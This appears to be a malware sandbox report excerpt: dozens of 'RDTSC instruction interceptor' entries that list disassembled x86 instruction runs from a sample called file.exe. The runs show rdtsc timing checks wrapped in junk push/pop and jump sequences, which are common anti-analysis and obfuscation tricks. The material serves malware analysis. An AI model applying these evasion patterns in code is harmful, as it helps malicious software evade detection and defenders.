                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 461FE8 second address: 46200A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EFh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F25EC6CB8E6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46200A second address: 46200E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46200E second address: 462047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jne 00007F25EC6CB8FEh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 462047 second address: 462068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46219B second address: 46219F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46219F second address: 4621A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4648ED second address: 46491B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F25EC6CB8F3h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46491B second address: 46491F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46498C second address: 4649C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F25EC6CB8E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, 43E90145h 0x00000014 push 00000000h 0x00000016 mov edi, dword ptr [ebp+122D1E0Bh] 0x0000001c mov edi, dword ptr [ebp+122D2A39h] 0x00000022 call 00007F25EC6CB8E9h 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a jl 00007F25EC6CB8E6h 0x00000030 pop edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4649C1 second address: 464A06 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F25ED41A9ECh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F25ED41A9F7h 0x00000012 jmp 00007F25ED41A9F1h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F25ED41A9F0h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464AD7 second address: 464ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464ADB second address: 464B02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25ED41A9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F25ED41A9E6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007F25ED41A9ECh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464B02 second address: 464B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F25EC6CB8F2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F25EC6CB8EDh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464B2D second address: 464B50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464B50 second address: 464B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464C55 second address: 464CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 xor dword ptr [esp], 3F58D681h 0x0000000b mov dword ptr [ebp+122D34B7h], esi 0x00000011 push 00000003h 0x00000013 push edi 0x00000014 mov edx, eax 0x00000016 pop edx 0x00000017 push 00000000h 0x00000019 cmc 0x0000001a push 00000003h 0x0000001c or edx, dword ptr [ebp+122D28CDh] 0x00000022 push BD5C10E0h 0x00000027 ja 00007F25ED41A9FCh 0x0000002d jmp 00007F25ED41A9F6h 0x00000032 add dword ptr [esp], 02A3EF20h 0x00000039 mov ecx, 39883721h 0x0000003e lea ebx, dword ptr [ebp+12456826h] 0x00000044 or dword ptr [ebp+122D3725h], edi 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c jbe 00007F25ED41A9ECh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464DB7 second address: 464DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464DBD second address: 464DCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 464DCA second address: 464E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EBh 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F25EC6CB8F1h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jne 00007F25EC6CB8F0h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jmp 00007F25EC6CB8F2h 0x00000025 pop eax 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F25EC6CB8E8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jo 00007F25EC6CB8ECh 0x00000046 mov edx, dword ptr [ebp+122D2959h] 0x0000004c push ecx 0x0000004d pop esi 0x0000004e push 00000003h 0x00000050 sub dword ptr [ebp+122D1802h], ecx 0x00000056 push 00000000h 0x00000058 movzx edx, si 0x0000005b push 00000003h 0x0000005d add dword ptr [ebp+122D180Bh], edx 0x00000063 mov dh, bl 0x00000065 push 87B38EF1h 0x0000006a pushad 0x0000006b ja 00007F25EC6CB8E8h 0x00000071 push eax 0x00000072 push edx 0x00000073 jo 00007F25EC6CB8E6h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 477928 second address: 47792E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47792E second address: 477938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483AE8 second address: 483AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483AEE second address: 483AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483C53 second address: 483C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25ED41A9E6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483C61 second address: 483C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnl 00007F25EC6CB8E6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483C72 second address: 483C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483DDD second address: 483DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8EBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F62 second address: 483F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F66 second address: 483F72 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25EC6CB8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F72 second address: 483F8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F25ED41A9F4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 483F8C second address: 483F90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484252 second address: 484257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484257 second address: 484267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007F25EC6CB8E6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484267 second address: 484273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F25ED41A9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484273 second address: 484281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484281 second address: 484285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484285 second address: 484289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484289 second address: 4842B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F25ED41A9F3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484594 second address: 484598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 484598 second address: 4845A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jl 00007F25ED41A9E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4845A8 second address: 4845B8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F25EC6CB8EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48473D second address: 48475F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9ECh 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F25ED41A9E6h 0x00000011 jmp 00007F25ED41A9EAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4848AA second address: 4848AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4848AE second address: 4848B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4853D2 second address: 4853E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F25EC6CB8F0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485942 second address: 485952 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25ED41A9E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485952 second address: 485956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485956 second address: 48595A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48595A second address: 485968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485968 second address: 48596E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48596E second address: 485972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485972 second address: 485992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485992 second address: 485996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48809D second address: 4880A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880A1 second address: 4880C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F25EC6CB8F6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4880C0 second address: 4880C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B921 second address: 48B939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnl 00007F25EC6CB8E6h 0x0000000f jnp 00007F25EC6CB8E6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B939 second address: 48B943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F25ED41A9E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490E36 second address: 490E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490E42 second address: 490E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490E48 second address: 490E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44CDBA second address: 44CDC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490292 second address: 4902C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F25EC6CB90Bh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4902C6 second address: 4902CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49069B second address: 4906A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4906A3 second address: 4906F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F25ED41A9F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F25ED41A9F4h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F25ED41A9EEh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d jc 00007F25ED41AA0Fh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490A5C second address: 490A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490CC4 second address: 490CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 490CC8 second address: 490CCE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4918D5 second address: 4918D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 491B4D second address: 491B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F25EC6CB8ECh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4921D4 second address: 4921D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4921D8 second address: 4921F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F25EC6CB8ECh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4924BE second address: 4924C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4924C3 second address: 4924C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4934E4 second address: 4934E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495B75 second address: 495BB4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F25EC6CB8E8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D2B75h] 0x00000027 push 00000000h 0x00000029 or dword ptr [ebp+122D187Ah], ecx 0x0000002f push 00000000h 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 jl 00007F25EC6CB8E6h 0x0000003b pop edi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495BB4 second address: 495BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495BBA second address: 495BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 495BBE second address: 495BC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496344 second address: 496366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497B47 second address: 497B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F25ED41A9ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C457 second address: 49C478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F25EC6CB8E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F25EC6CB8EDh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C478 second address: 49C47C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C47C second address: 49C480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EA5D second address: 49EA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EA64 second address: 49EABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F25EC6CB8F3h 0x0000000f nop 0x00000010 jmp 00007F25EC6CB8F1h 0x00000015 push 00000000h 0x00000017 movzx ebx, si 0x0000001a push 00000000h 0x0000001c movzx edi, ax 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 jmp 00007F25EC6CB8EDh 0x00000028 pop esi 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49DC4F second address: 49DC69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FBF2 second address: 49FC02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F25EC6CB8E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FC02 second address: 49FC06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
